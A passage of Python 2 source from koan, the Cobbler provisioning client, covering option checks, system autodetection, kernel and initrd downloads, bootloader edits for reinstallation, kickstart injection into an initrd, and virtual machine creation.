self.virt_path = None
self.force_path = None
self.qemu_disk_type = None
self.qemu_net_type = None
self.qemu_machine_type = None
self.virt_auto_boot = None
# This option adds the --copy-default argument to /sbin/grubby
# which uses the default boot entry in the grub.conf
# as template for the new entry being added to that file.
# look at /sbin/grubby --help for more info
self.no_copy_default = None
#---------------------------------------------------
def run(self):
"""
koan's main function...
"""
# we can get the info we need from either the cobbler server
# or a kickstart file
if self.server is None:
raise InfoException, "no server specified"
# check to see that exclusive arguments weren't used together
found = 0
for x in (self.is_virt, self.is_replace, self.is_update_files, self.is_display, self.list_items, self.is_update_config):
if x:
found = found+1
if found != 1:
raise InfoException, "choose: --virt, --replace-self, --update-files, --list=what, or --display"
# This set of options are only valid with --server
if not self.server or self.server == "":
if self.list_items or self.profile or self.system or self.port:
raise InfoException, "--server is required"
self.xmlrpc_server = utils.connect_to_server(server=self.server, port=self.port)
if self.list_items:
self.list(self.list_items)
return
if not os.getuid() == 0:
if self.is_virt:
print "warning: running as non root"
else:
print "this operation requires root access"
return 3
# if both --profile and --system were ommitted, autodiscover
if self.is_virt:
if (self.profile is None and self.system is None and self.image is None):
raise InfoException, "must specify --profile, --system, or --image"
else:
if (self.profile is None and self.system is None and self.image is None):
self.system = self.autodetect_system(allow_interactive=self.live_cd)
if self.system is None:
while self.profile is None:
self.profile = self.ask_profile()
# if --virt-type was specified and invalid, then fail
if self.virt_type is not None:
self.virt_type = self.virt_type.lower()
if self.virt_type not in [ "qemu", "xenpv", "xenfv", "xen", "vmware", "vmwarew", "auto", "kvm" ]:
if self.virt_type == "xen":
self.virt_type = "xenpv"
raise InfoException, "--virt-type should be qemu, xenpv, xenfv, vmware, vmwarew, kvm, or auto"
# if --qemu-disk-type was called without --virt-type=qemu, then fail
if (self.qemu_disk_type is not None):
self.qemu_disk_type = self.qemu_disk_type.lower()
if self.virt_type not in [ "qemu", "auto", "kvm" ]:
raise InfoException, "--qemu-disk-type must use with --virt-type=qemu"
# if --qemu-net-type was called without --virt-type=qemu, then fail
if (self.qemu_net_type is not None):
self.qemu_net_type = self.qemu_net_type.lower()
if self.virt_type not in [ "qemu", "auto", "kvm" ]:
raise InfoException, "--qemu-net-type must use with --virt-type=qemu"
# if --qemu-machine-type was called without --virt-type=qemu, then fail
if (self.qemu_machine_type is not None):
self.qemu_machine_type = self.qemu_machine_type.lower()
if self.virt_type not in [ "qemu", "auto", "kvm" ]:
raise InfoException, "--qemu-machine-type must use with --virt-type=qemu"
# if --static-interface and --profile was called together, then fail
if self.static_interface is not None and self.profile is not None:
raise InfoException, "--static-interface option is incompatible with --profile option use --system instead"
# perform one of three key operations
if self.is_virt:
self.virt()
elif self.is_replace:
if self.use_kexec:
self.kexec_replace()
else:
self.replace()
elif self.is_update_files:
self.update_files()
elif self.is_update_config:
self.update_config()
else:
self.display()
# --------------------------------------------------
def ask_profile(self):
"""
Used by the live CD mode, if the system can not be auto-discovered, show a list of available
profiles and ask the user what they want to install.
"""
# FIXME: use a TUI library to make this more presentable.
try:
available_profiles = self.xmlrpc_server.get_profiles()
except:
traceback.print_exc()
self.connect_fail()
print "\n- which profile to install?\n"
for x in available_profiles:
print "%s" % x["name"]
sys.stdout.write("\n?>")
data = sys.stdin.readline().strip()
for x in available_profiles:
print "comp (%s,%s)" % (x["name"],data)
if x["name"] == data:
return data
return None
#---------------------------------------------------
def autodetect_system(self, allow_interactive=False):
"""
Determine the name of the cobbler system record that
matches this MAC address.
"""
systems = self.get_data("systems")
my_netinfo = utils.get_network_info()
my_interfaces = my_netinfo.keys()
mac_criteria = []
ip_criteria = []
for my_interface in my_interfaces:
mac_criteria.append(my_netinfo[my_interface]["mac_address"].upper())
ip_criteria.append(my_netinfo[my_interface]["ip_address"])
detected_systems = []
systems = self.get_data("systems")
for system in systems:
obj_name = system["name"]
for (obj_iname, obj_interface) in system['interfaces'].iteritems():
mac = obj_interface["mac_address"].upper()
ip = obj_interface["ip_address"].upper()
for my_mac in mac_criteria:
if mac == my_mac:
detected_systems.append(obj_name)
for my_ip in ip_criteria:
if ip == my_ip:
detected_systems.append(obj_name)
detected_systems = utils.uniqify(detected_systems)
if len(detected_systems) > 1:
raise InfoException, "Error: Multiple systems matched"
elif len(detected_systems) == 0:
if not allow_interactive:
mac_criteria = utils.uniqify(mac_criteria, purge="?")
ip_criteria = utils.uniqify(ip_criteria, purge="?")
raise InfoException, "Error: Could not find a matching system with MACs: %s or IPs: %s" % (",".join(mac_criteria), ",".join(ip_criteria))
else:
return None
elif len(detected_systems) == 1:
print "- Auto detected: %s" % detected_systems[0]
return detected_systems[0]
#---------------------------------------------------
def safe_load(self,hashv,primary_key,alternate_key=None,default=None):
if hashv.has_key(primary_key):
return hashv[primary_key]
elif alternate_key is not None and hashv.has_key(alternate_key):
return hashv[alternate_key]
else:
return default
#---------------------------------------------------
def net_install(self,after_download):
"""
Actually kicks off downloads and auto-ks or virt installs
"""
# initialise the profile, from the server if any
if self.profile:
profile_data = self.get_data("profile",self.profile)
elif self.system:
profile_data = self.get_data("system",self.system)
elif self.image:
profile_data = self.get_data("image",self.image)
else:
# shouldn't end up here, right?
profile_data = {}
if profile_data.get("kickstart","") != "":
# fix URLs
if profile_data["kickstart"][0] == "/" or profile_data["template_remote_kickstarts"]:
if not self.system:
profile_data["kickstart"] = "http://%s/cblr/svc/op/ks/profile/%s" % (profile_data['http_server'], profile_data['name'])
else:
profile_data["kickstart"] = "http://%s/cblr/svc/op/ks/system/%s" % (profile_data['http_server'], profile_data['name'])
# If breed is ubuntu/debian we need to source the install tree differently
# as preseeds are used instead of kickstarts.
if profile_data["breed"] in [ "ubuntu", "debian" ]:
self.get_install_tree_for_debian_ubuntu(profile_data)
else:
# find_kickstart source tree in the kickstart file
self.get_install_tree_from_kickstart(profile_data)
# if we found an install_tree, and we don't have a kernel or initrd
# use the ones in the install_tree
if self.safe_load(profile_data,"install_tree"):
if not self.safe_load(profile_data,"kernel"):
profile_data["kernel"] = profile_data["install_tree"] + "/images/pxeboot/vmlinuz"
if not self.safe_load(profile_data,"initrd"):
profile_data["initrd"] = profile_data["install_tree"] + "/images/pxeboot/initrd.img"
# find the correct file download location
if not self.is_virt:
if os.path.exists("/boot/efi/EFI/redhat/elilo.conf"):
# elilo itanium support, may actually still work
download = "/boot/efi/EFI/redhat"
else:
# whew, we have a sane bootloader
download = "/boot"
else:
# ensure we have a good virt type choice and know where
# to download the kernel/initrd
if self.virt_type is None:
self.virt_type = self.safe_load(profile_data,'virt_type',default=None)
if self.virt_type is None or self.virt_type == "":
self.virt_type = "auto"
# if virt type is auto, reset it to a value we can actually use
if self.virt_type == "auto":
if profile_data.get("xml_file","") != "":
raise InfoException("xmlfile based installations are not supported")
elif profile_data.has_key("file"):
print "- ISO or Image based installation, always uses --virt-type=qemu"
self.virt_type = "qemu"
else:
# FIXME: auto never selects vmware, maybe it should if we find it?
if not ANCIENT_PYTHON:
cmd = sub_process.Popen("/bin/uname -r", stdout=sub_process.PIPE, shell=True)
uname_str = cmd.communicate()[0]
if uname_str.find("xen") != -1:
self.virt_type = "xenpv"
elif os.path.exists("/usr/bin/qemu-img"):
self.virt_type = "qemu"
else:
# assume Xen, we'll check to see if virt-type is really usable later.
raise InfoException, "Not running a Xen kernel and qemu is not installed"
print "- no virt-type specified, auto-selecting %s" % self.virt_type
# now that we've figured out our virt-type, let's see if it is really usable
# rather than showing obscure error messages from Xen to the user :)
if self.virt_type in [ "xenpv", "xenfv" ]:
cmd = sub_process.Popen("uname -r", stdout=sub_process.PIPE, shell=True)
uname_str = cmd.communicate()[0]
# correct kernel on dom0?
if uname_str < "2.6.37" and uname_str.find("xen") == -1:
raise InfoException("kernel >= 2.6.37 or kernel-xen needs to be in use")
# xend installed?
if not os.path.exists("/usr/sbin/xend"):
raise InfoException("xen package needs to be installed")
# xend running?
rc = sub_process.call("/usr/sbin/xend status", stderr=None, stdout=None, shell=True)
if rc != 0:
raise InfoException("xend needs to be started")
# for qemu
if self.virt_type in [ "qemu", "kvm" ]:
# qemu package installed?
if not os.path.exists("/usr/bin/qemu-img"):
raise InfoException("qemu package needs to be installed")
# is libvirt new enough?
cmd = sub_process.Popen("rpm -q python-virtinst", stdout=sub_process.PIPE, shell=True)
version_str = cmd.communicate()[0]
if version_str.find("virtinst-0.1") != -1 or version_str.find("virtinst-0.0") != -1:
raise InfoException("need python-virtinst >= 0.2 to do installs for qemu/kvm")
# for vmware
if self.virt_type == "vmware" or self.virt_type == "vmwarew":
# FIXME: if any vmware specific checks are required (for deps) do them here.
pass
if self.virt_type == "virt-image":
if not os.path.exists("/usr/bin/virt-image"):
raise InfoException("virt-image not present, downlevel virt-install package?")
# for both virt types
if os.path.exists("/etc/rc.d/init.d/libvirtd"):
rc = sub_process.call("/sbin/service libvirtd status", stdout=None, shell=True)
if rc != 0:
# libvirt running?
raise InfoException("libvirtd needs to be running")
if self.virt_type in [ "xenpv" ]:
# we need to fetch the kernel/initrd to do this
download = "/var/lib/xen"
elif self.virt_type in [ "xenfv", "vmware", "vmwarew" ] :
# we are downloading sufficient metadata to initiate PXE, no D/L needed
download = None
else: # qemu
# fullvirt, can use set_location in virtinst library, no D/L needed yet
download = None
# download required files
if not self.is_display and download is not None:
self.get_distro_files(profile_data, download)
# perform specified action
after_download(self, profile_data)
#---------------------------------------------------
def get_install_tree_from_kickstart(self,profile_data):
"""
Scan the kickstart configuration for either a "url" or "nfs" command
take the install_tree url from that
"""
if profile_data["breed"] == "suse":
kopts = profile_data["kernel_options"]
options = kopts.split(" ")
for opt in options:
if opt.startswith("install="):
profile_data["install_tree"] = opt.replace("install=","")
break
else:
try:
raw = utils.urlread(profile_data["kickstart"])
lines = raw.splitlines()
method_re = re.compile('(?P<urlcmd>\s*url\s.*)|(?P<nfscmd>\s*nfs\s.*)')
url_parser = OptionParser()
url_parser.add_option("--url", dest="url")
nfs_parser = OptionParser()
nfs_parser.add_option("--dir", dest="dir")
nfs_parser.add_option("--server", dest="server")
for line in lines:
match = method_re.match(line)
if match:
cmd = match.group("urlcmd")
if cmd:
(options,args) = url_parser.parse_args(shlex.split(cmd)[1:])
profile_data["install_tree"] = options.url
break
cmd = match.group("nfscmd")
if cmd:
(options,args) = nfs_parser.parse_args(shlex.split(cmd)[1:])
profile_data["install_tree"] = "nfs://%s:%s" % (options.server,options.dir)
break
if self.safe_load(profile_data,"install_tree"):
print "install_tree:", profile_data["install_tree"]
else:
print "warning: kickstart found but no install_tree found"
except:
# unstable to download the kickstart, however this might not
# be an error. For instance, xen FV installations of non
# kickstart OS's...
pass
#---------------------------------------------------
def get_install_tree_for_debian_ubuntu(self, profile_data):
"""
Split ks_meta to obtain the tree path. Generate the install_tree
using the http_server and the tree obtained from splitting ks_meta
"""
try:
tree = profile_data["ks_meta"].split("@@")[-1].strip()
# Ensure we only take the tree in case ks_meta args are passed
tree = tree.split()[0]
profile_data["install_tree"] = tree
if self.safe_load(profile_data,"install_tree"):
print "install_tree:", profile_data["install_tree"]
else:
print "warning: kickstart found but no install_tree found"
except:
pass
#---------------------------------------------------
def list(self,what):
if what not in [ "images", "profiles", "systems", "distros", "repos" ]:
raise InfoException("koan does not know how to list that")
data = self.get_data(what)
for x in data:
if x.has_key("name"):
print x["name"]
return True
#---------------------------------------------------
def display(self):
def after_download(self, profile_data):
for x in DISPLAY_PARAMS:
if profile_data.has_key(x):
value = profile_data[x]
if x == 'kernel_options':
value = self.calc_kernel_args(profile_data)
print "%20s : %s" % (x, value)
return self.net_install(after_download)
#---------------------------------------------------
def virt(self):
"""
Handle virt provisioning.
"""
def after_download(self, profile_data):
self.virt_net_install(profile_data)
return self.net_install(after_download)
#---------------------------------------------------
def update_files(self):
"""
Contact the cobbler server and wget any config-management
files in cobbler that we are providing to nodes. Basically
this turns cobbler into a lighweight configuration management
system for folks who are not needing a more complex CMS.
Read more at:
https://github.com/cobbler/cobbler/wiki/Built-in-configuration-management
"""
# FIXME: make this a utils.py function
if self.profile:
profile_data = self.get_data("profile",self.profile)
elif self.system:
profile_data = self.get_data("system",self.system)
elif self.image:
profile_data = self.get_data("image",self.image)
else:
# shouldn't end up here, right?
profile_data = {}
# BOOKMARK
template_files = profile_data["template_files"]
template_files = utils.input_string_or_hash(template_files)
template_keys = template_files.keys()
print "- template map: %s" % template_files
print "- processing for files to download..."
for src in template_keys:
dest = template_files[src]
save_as = dest
dest = dest.replace("_","__")
dest = dest.replace("/","_")
if not save_as.startswith("/"):
# this is a file in the template system that is not to be downloaded
continue
print "- file: %s" % save_as
pattern = "http://%s/cblr/svc/op/template/%s/%s/path/%s"
if profile_data.has_key("interfaces"):
url = pattern % (profile_data["http_server"],"system",profile_data["name"],dest)
else:
url = pattern % (profile_data["http_server"],"profile",profile_data["name"],dest)
if not os.path.exists(os.path.dirname(save_as)):
os.makedirs(os.path.dirname(save_as))
cmd = [ "/usr/bin/wget", url, "--output-document", save_as ]
utils.subprocess_call(cmd)
return True
#---------------------------------------------------
def update_config(self):
"""
Contact the cobbler server and update the system configuration using
cobbler's built-in configuration management. Configs are based on
a combination of mgmt-classes assigned to the system, profile, and
distro.
"""
# FIXME get hostname from utils?
hostname = socket.gethostname()
server = self.xmlrpc_server
try:
config = server.get_config_data(hostname)
except:
traceback.print_exc()
self.connect_fail()
# FIXME should we version this, maybe append a timestamp?
node_config_data = "/var/lib/koan/config/localconfig.json"
f = open(node_config_data, 'w')
f.write(config)
f.close()
print "- Starting configuration run for %s" % (hostname)
runtime_start = time.time()
configure = configurator.KoanConfigure(config)
stats = configure.run()
runtime_end = time.time()
if self.summary:
pstats = (stats["pkg"]['nsync'],stats["pkg"]['osync'],stats["pkg"]['fail'],stats["pkg"]['runtime'])
dstats = (stats["dir"]['nsync'],stats["dir"]['osync'],stats["dir"]['fail'],stats["dir"]['runtime'])
fstats = (stats["files"]['nsync'],stats["files"]['osync'],stats["files"]['fail'],stats["files"]['runtime'])
nsync = pstats[0] + dstats[0] + fstats[0]
osync = pstats[1] + dstats[1] + fstats[1]
fail = pstats[2] + dstats[2] + fstats[2]
total_resources = (nsync + osync + fail)
total_runtime = (runtime_end - runtime_start)
print
print "\tResource Report"
print "\t-------------------------"
print "\t In Sync: %d" % nsync
print "\tOut of Sync: %d" % osync
print "\t Fail: %d" % fail
print "\t-------------------------"
print "\tTotal Resources: %d" % total_resources
print "\t Total Runtime: %.02f" % total_runtime
for status in ["repos_status", "ldap_status", "monit_status"]:
if status in stats:
print
print "\t%s" % status
print "\t-------------------------"
print "\t%s" % stats[status]
print "\t-------------------------"
print
print "\tResource |In Sync|OO Sync|Failed|Runtime"
print "\t----------------------------------------"
print "\t Packages: %d %d %d %.02f" % pstats
print "\t Directories: %d %d %d %.02f" % dstats
print "\t Files: %d %d %d %.02f" % fstats
print
#---------------------------------------------------
def kexec_replace(self):
"""
Prepare to morph existing system by downloading new kernel and initrd
and preparing kexec to execute them. Allow caller to do final 'kexec
-e' invocation; this allows modules such as network drivers to be
unloaded (for cases where an immediate kexec would leave the driver in
an invalid state.
"""
def after_download(self, profile_data):
k_args = self.calc_kernel_args(profile_data)
kickstart = self.safe_load(profile_data,'kickstart')
arch = self.safe_load(profile_data,'arch')
(make, version) = utils.os_release()
if (make == "centos" and version < 6) or (make == "redhat" and version < 6) or (make == "fedora" and version < 10):
# embed the initrd in the kickstart file because of libdhcp and/or pump
# needing the help due to some DHCP timeout potential in some certain
# network configs.
if self.embed_kickstart:
self.build_initrd(
self.safe_load(profile_data,'initrd_local'),
kickstart,
profile_data
)
# Validate kernel argument length (limit depends on architecture --
# see asm-*/setup.h). For example:
# asm-i386/setup.h:#define COMMAND_LINE_SIZE 256
# asm-ia64/setup.h:#define COMMAND_LINE_SIZE 512
# asm-powerpc/setup.h:#define COMMAND_LINE_SIZE 512
# asm-s390/setup.h:#define COMMAND_LINE_SIZE 896
# asm-x86_64/setup.h:#define COMMAND_LINE_SIZE 256
# arch/x86/include/asm/setup.h:#define COMMAND_LINE_SIZE 2048
if arch.startswith("ppc") or arch.startswith("ia64"):
if len(k_args) > 511:
raise InfoException, "Kernel options are too long, 512 chars exceeded: %s" % k_args
elif arch.startswith("s390"):
if len(k_args) > 895:
raise InfoException, "Kernel options are too long, 896 chars exceeded: %s" % k_args
elif len(k_args) > 2048:
raise InfoException, "Kernel options are too long, 2048 chars exceeded: %s" % k_args
utils.subprocess_call([
'kexec',
'--load',
'--initrd=%s' % (self.safe_load(profile_data,'initrd_local'),),
'--command-line=%s' % (k_args,),
self.safe_load(profile_data,'kernel_local')
])
print "Kernel loaded; run 'kexec -e' to execute"
return self.net_install(after_download)
#---------------------------------------------------
def get_boot_loader_info(self):
if ANCIENT_PYTHON:
# FIXME: implement this to work w/o subprocess
if os.path.exists("/etc/grub.conf"):
return (0, "grub")
else:
return (0, "lilo")
cmd = [ "/sbin/grubby", "--bootloader-probe" ]
probe_process = sub_process.Popen(cmd, stdout=sub_process.PIPE)
which_loader = probe_process.communicate()[0]
return probe_process.returncode, which_loader
def replace(self):
"""
Handle morphing an existing system through downloading new
kernel, new initrd, and installing a kickstart in the initrd,
then manipulating grub.
"""
try:
shutil.rmtree("/var/spool/koan")
except OSError, (err, msg):
if err != errno.ENOENT:
raise
try:
os.makedirs("/var/spool/koan")
except OSError, (err, msg):
if err != errno.EEXIST:
raise
def after_download(self, profile_data):
use_grubby = False
use_grub2 = False
(make, version) = utils.os_release()
if make in ['ubuntu', 'debian']:
if not os.path.exists("/usr/sbin/update-grub"):
raise InfoException, "grub2 is not installed"
use_grub2 = True
else:
if not os.path.exists("/sbin/grubby"):
raise InfoException, "grubby is not installed"
use_grubby = True
k_args = self.calc_kernel_args(profile_data,replace_self=1)
kickstart = self.safe_load(profile_data,'kickstart')
if (make == "centos" and version < 6) or (make == "redhat" and version < 6) or (make == "fedora" and version < 10):
# embed the initrd in the kickstart file because of libdhcp and/or pump
# needing the help due to some DHCP timeout potential in some certain
# network configs.
if self.embed_kickstart:
self.build_initrd(
self.safe_load(profile_data,'initrd_local'),
kickstart,
profile_data
)
if not ANCIENT_PYTHON:
arch_cmd = sub_process.Popen("/bin/uname -m", stdout=sub_process.PIPE, shell=True)
arch = arch_cmd.communicate()[0]
else:
arch = "i386"
# Validate kernel argument length (limit depends on architecture --
# see asm-*/setup.h). For example:
# asm-i386/setup.h:#define COMMAND_LINE_SIZE 256
# asm-ia64/setup.h:#define COMMAND_LINE_SIZE 512
# asm-powerpc/setup.h:#define COMMAND_LINE_SIZE 512
# asm-s390/setup.h:#define COMMAND_LINE_SIZE 896
# asm-x86_64/setup.h:#define COMMAND_LINE_SIZE 256
# arch/x86/include/asm/setup.h:#define COMMAND_LINE_SIZE 2048
if not ANCIENT_PYTHON:
if arch.startswith("ppc") or arch.startswith("ia64"):
if len(k_args) > 511:
raise InfoException, "Kernel options are too long, 512 chars exceeded: %s" % k_args
elif arch.startswith("s390"):
if len(k_args) > 895:
raise InfoException, "Kernel options are too long, 896 chars exceeded: %s" % k_args
elif len(k_args) > 2048:
raise InfoException, "Kernel options are too long, 2048 chars exceeded: %s" % k_args
if use_grubby:
cmd = [ "/sbin/grubby",
"--add-kernel", self.safe_load(profile_data,'kernel_local'),
"--initrd", self.safe_load(profile_data,'initrd_local'),
"--args", "\"%s\"" % k_args
]
if not self.no_copy_default:
cmd.append("--copy-default")
boot_probe_ret_code, probe_output = self.get_boot_loader_info()
if boot_probe_ret_code == 0 and string.find(probe_output, "lilo") >= 0:
cmd.append("--lilo")
if self.add_reinstall_entry:
cmd.append("--title=Reinstall")
else:
cmd.append("--make-default")
cmd.append("--title=kick%s" % int(time.time()))
if self.live_cd:
cmd.append("--bad-image-okay")
cmd.append("--boot-filesystem=/")
cmd.append("--config-file=/tmp/boot/boot/grub/grub.conf")
# Are we running on ppc?
if not ANCIENT_PYTHON:
if arch.startswith("ppc"):
cmd.append("--yaboot")
elif arch.startswith("s390"):
cmd.append("--zipl")
utils.subprocess_call(cmd)
# Any post-grubby processing required (e.g. ybin, zipl, lilo)?
if not ANCIENT_PYTHON and arch.startswith("ppc"):
# FIXME - CHRP hardware uses a 'PPC PReP Boot' partition and doesn't require running ybin
print "- applying ybin changes"
cmd = [ "/sbin/ybin" ]
utils.subprocess_call(cmd)
elif not ANCIENT_PYTHON and arch.startswith("s390"):
print "- applying zipl changes"
cmd = [ "/sbin/zipl" ]
utils.subprocess_call(cmd)
else:
# if grubby --bootloader-probe returns lilo,
# apply lilo changes
if boot_probe_ret_code == 0 and string.find(probe_output, "lilo") != -1:
print "- applying lilo changes"
cmd = [ "/sbin/lilo" ]
utils.subprocess_call(cmd)
elif use_grub2:
# Use grub2 for --replace-self
kernel_local = self.safe_load(profile_data,'kernel_local')
initrd_local = self.safe_load(profile_data,'initrd_local')
# Set name for grub2 menuentry
if self.add_reinstall_entry:
name = "Reinstall: %s" % profile_data['name']
else:
name = "%s" % profile_data['name']
# Set paths for Ubuntu/Debian
# TODO: Add support for other distros when they ship grub2
if make in ['ubuntu', 'debian']:
grub_file = "/etc/grub.d/42_koan"
grub_default_file = "/etc/default/grub"
cmd = ["update-grub"]
default_cmd = ['sed', '-i', 's/^GRUB_DEFAULT\=.*$/GRUB_DEFAULT="%s"/g' % name, grub_default_file]
# Create grub2 menuentry
grub_entry = """
cat <<EOF
menuentry "%s" {
linux %s %s
initrd %s
}
EOF
""" % (name, kernel_local, k_args, initrd_local)
# Save grub2 menuentry
fd = open(grub_file,"w")
fd.write(grub_entry)
fd.close()
os.chmod(grub_file, 0755)
# Set default grub entry for reboot
if not self.add_reinstall_entry:
print "- setting grub2 default entry"
sub_process.call(default_cmd)
# Run update-grub
utils.subprocess_call(cmd)
if not self.add_reinstall_entry:
print "- reboot to apply changes"
else:
print "- reinstallation entry added"
return self.net_install(after_download)
#---------------------------------------------------
def get_insert_script(self,initrd):
"""
Create bash script for inserting kickstart into initrd.
Code heavily borrowed from internal auto-ks scripts.
"""
return r"""
cd /var/spool/koan
mkdir initrd
gzip -dc %s > initrd.tmp
if mount -o loop -t ext2 initrd.tmp initrd >&/dev/null ; then
cp ks.cfg initrd/
ln initrd/ks.cfg initrd/tmp/ks.cfg
umount initrd
gzip -c initrd.tmp > initrd_final
else
echo "mount failed; treating initrd as a cpio archive..."
cd initrd
cpio -id <../initrd.tmp
cp /var/spool/koan/ks.cfg .
ln ks.cfg tmp/ks.cfg
find . | cpio -o -H newc | gzip -9 > ../initrd_final
echo "...done"
fi
""" % initrd
#---------------------------------------------------
def build_initrd(self,initrd,kickstart,data):
"""
Crack open an initrd and install the kickstart file.
"""
# save kickstart to file
ksdata = utils.urlread(kickstart)
fd = open("/var/spool/koan/ks.cfg","w+")
if ksdata is not None:
fd.write(ksdata)
fd.close()
# handle insertion of kickstart based on type of initrd
fd = open("/var/spool/koan/insert.sh","w+")
fd.write(self.get_insert_script(initrd))
fd.close()
utils.subprocess_call([ "/bin/bash", "/var/spool/koan/insert.sh" ])
shutil.copyfile("/var/spool/koan/initrd_final", initrd)
#---------------------------------------------------
def connect_fail(self):
raise InfoException, "Could not communicate with %s:%s" % (self.server, self.port)
#---------------------------------------------------
def get_data(self,what,name=None):
try:
if what[-1] == "s":
data = getattr(self.xmlrpc_server, "get_%s" % what)()
else:
data = getattr(self.xmlrpc_server, "get_%s_for_koan" % what)(name)
except:
traceback.print_exc()
self.connect_fail()
if data == {}:
raise InfoException("No entry/entries found")
return data
#---------------------------------------------------
def get_ips(self,strdata):
"""
Return a list of IP address strings found in argument.
warning: not IPv6 friendly
"""
return re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}',strdata)
#---------------------------------------------------
def get_macs(self,strdata):
"""
Return a list of MAC address strings found in argument.
"""
return re.findall(r'[A-F0-9]{2}:[A-F0-9]{2}:[A-F0-9]{2}:[A-F0-9]{2}:[A-F:0-9]{2}:[A-F:0-9]{2}', strdata.upper())
#---------------------------------------------------
def is_ip(self,strdata):
"""
Is strdata an IP?
warning: not IPv6 friendly
"""
return self.get_ips(strdata) and True or False
#---------------------------------------------------
def is_mac(self,strdata):
"""
Return whether the argument is a mac address.
"""
return self.get_macs(strdata) and True or False
#---------------------------------------------------
def get_distro_files(self,profile_data, download_root):
"""
Using distro data (fetched from bootconf tree), determine
what kernel and initrd to download, and save them locally.
"""
os.chdir(download_root)
distro = self.safe_load(profile_data,'distro')
kernel = self.safe_load(profile_data,'kernel')
initrd = self.safe_load(profile_data,'initrd')
kernel_short = os.path.basename(kernel)
initrd_short = os.path.basename(initrd)
kernel_save = "%s/%s_koan" % (download_root, kernel_short)
initrd_save = "%s/%s_koan" % (download_root, initrd_short)
if self.server:
if kernel[0] == "/":
kernel = "http://%s/cobbler/images/%s/%s" % (profile_data["http_server"], distro, kernel_short)
if initrd[0] == "/":
initrd = "http://%s/cobbler/images/%s/%s" % (profile_data["http_server"], distro, initrd_short)
try:
print "downloading initrd %s to %s" % (initrd_short, initrd_save)
print "url=%s" % initrd
utils.urlgrab(initrd,initrd_save)
print "downloading kernel %s to %s" % (kernel_short, kernel_save)
print "url=%s" % kernel
utils.urlgrab(kernel,kernel_save)
except:
traceback.print_exc()
raise InfoException, "error downloading files"
profile_data['kernel_local'] = kernel_save
profile_data['initrd_local'] = initrd_save
#---------------------------------------------------
def calc_kernel_args(self, pd, replace_self=0):
kickstart = self.safe_load(pd,'kickstart')
options = self.safe_load(pd,'kernel_options',default='')
breed = self.safe_load(pd,'breed')
kextra = ""
if kickstart is not None and kickstart != "":
if breed is not None and breed == "suse":
kextra = "autoyast=" + kickstart
elif breed is not None and breed == "debian" or breed =="ubuntu":
kextra = "auto url=" + kickstart
else:
kextra = "ks=" + kickstart
if options !="":
kextra = kextra + " " + options
# parser issues? lang needs a trailing = and somehow doesn't have it.
# convert the from-cobbler options back to a hash
# so that we can override it in a way that works as intended
hashv = utils.input_string_or_hash(kextra)
if self.static_interface is not None and (breed == "redhat" or breed == "suse"):
interface_name = self.static_interface
interfaces = self.safe_load(pd, "interfaces")
if interface_name.startswith("eth"):
alt_interface_name = interface_name.replace("eth", "intf")
interface_data = self.safe_load(interfaces, interface_name, alt_interface_name)
else:
interface_data = self.safe_load(interfaces, interface_name)
ip = self.safe_load(interface_data, "ip_address")
netmask = self.safe_load(interface_data, "netmask")
gateway = self.safe_load(pd, "gateway")
dns = self.safe_load(pd, "name_servers")
if breed == "suse":
hashv["netdevice"] = self.static_interface
else:
hashv["ksdevice"] = self.static_interface
if ip is not None:
if breed == "suse":
hashv["hostip"] = ip
else:
hashv["ip"] = ip
if netmask is not None:
hashv["netmask"] = netmask
if gateway is not None:
hashv["gateway"] = gateway
if dns is not None:
if breed == "suse":
hashv["nameserver"] = dns[0]
else:
hashv["dns"] = ",".join(dns)
if replace_self and self.embed_kickstart:
hashv["ks"] = "file:ks.cfg"
if self.kopts_override is not None:
hash2 = utils.input_string_or_hash(self.kopts_override)
hashv.update(hash2)
options = utils.hash_to_string(hashv)
options = string.replace(options, "lang ","lang= ")
# if using ksdevice=bootif that only works for PXE so replace
# it with something that will work
options = string.replace(options, "ksdevice=bootif","ksdevice=link")
return options
#---------------------------------------------------
def virt_net_install(self,profile_data):
"""
Invoke virt guest-install (or tweaked copy thereof)
"""
pd = profile_data
self.load_virt_modules()
arch = self.safe_load(pd,'arch','x86')
kextra = self.calc_kernel_args(pd)
(uuid, create_func, fullvirt, can_poll) = self.virt_choose(pd)
virtname = self.calc_virt_name(pd)
ram = self.calc_virt_ram(pd)
vcpus = self.calc_virt_cpus(pd)
path_list = self.calc_virt_path(pd, virtname)
size_list = self.calc_virt_filesize(pd)
driver_list = self.calc_virt_drivers(pd)
if self.virt_type == 'openvz':
disks = None
else:
disks = self.merge_disk_data(path_list,size_list,driver_list)
virt_auto_boot = self.calc_virt_autoboot(pd, self.virt_auto_boot)
results = create_func(
name = virtname,
ram = ram,
disks = disks,
uuid = uuid,
extra = kextra,
vcpus = vcpus,
profile_data = profile_data,
arch = arch,
no_gfx = self.no_gfx,
fullvirt = fullvirt,
bridge = self.virt_bridge,
virt_type = self.virt_type,
virt_auto_boot = virt_auto_boot,
qemu_driver_type = self.qemu_disk_type,
qemu_net_type = self.qemu_net_type,
qemu_machine_type = self.qemu_machine_type
)
#print results
if can_poll is not None and self.should_poll:
import libvirt
print "- polling for virt completion"
conn = None
if can_poll == "xen":
conn = libvirt.open(None)
elif can_poll == "qemu":
conn = libvirt.open("qemu:///system")
else:
raise InfoException("Don't know how to poll this virt-type")
ct = 0
while True:
time.sleep(3)
state = utils.get_vm_state(conn, virtname)
if state == "running":
print "- install is still running, sleeping for 1 minute (%s)" % ct
ct = ct + 1
time.sleep(60)
elif state == "crashed":
print "- the install seems to have crashed."
return "failed"
elif state == "shutdown":
print "- shutdown VM detected, is the install done? Restarting!"
utils.find_vm(conn, virtname).create()
return results
else:
raise InfoException("internal error, bad virt state")
if virt_auto_boot:
if self.virt_type in [ "xenpv", "xenfv" ]:
if not utils.create_xendomains_symlink(virtname):
print "- warning: failed to setup autoboot for %s, it will have to be configured manually" % virtname
elif self.virt_type in [ "qemu", "kvm" ]:
utils.libvirt_enable_autostart(virtname)
elif self.virt_type in [ "openvz" ]:
pass
else:
print "- warning: don't know how to autoboot this virt type yet"
# else...
return results
#---------------------------------------------------
def load_virt_modules(self):
try:
import xencreate
import qcreate
import imagecreate
except:
traceback.print_exc()
raise InfoException("no virtualization support available, install python-virtinst?")
#---------------------------------------------------
def virt_choose(self, pd):
fullvirt = False
can_poll = None
if (self.image is not None) and (pd["image_type"] == "virt-clone"):
fullvirt = True
uuid = None
import imagecreate
creator = imagecreate.start_install
elif self.virt_type in [ "xenpv", "xenfv" ]:
uuid = self.get_uuid(self.calc_virt_uuid(pd))
import xencreate
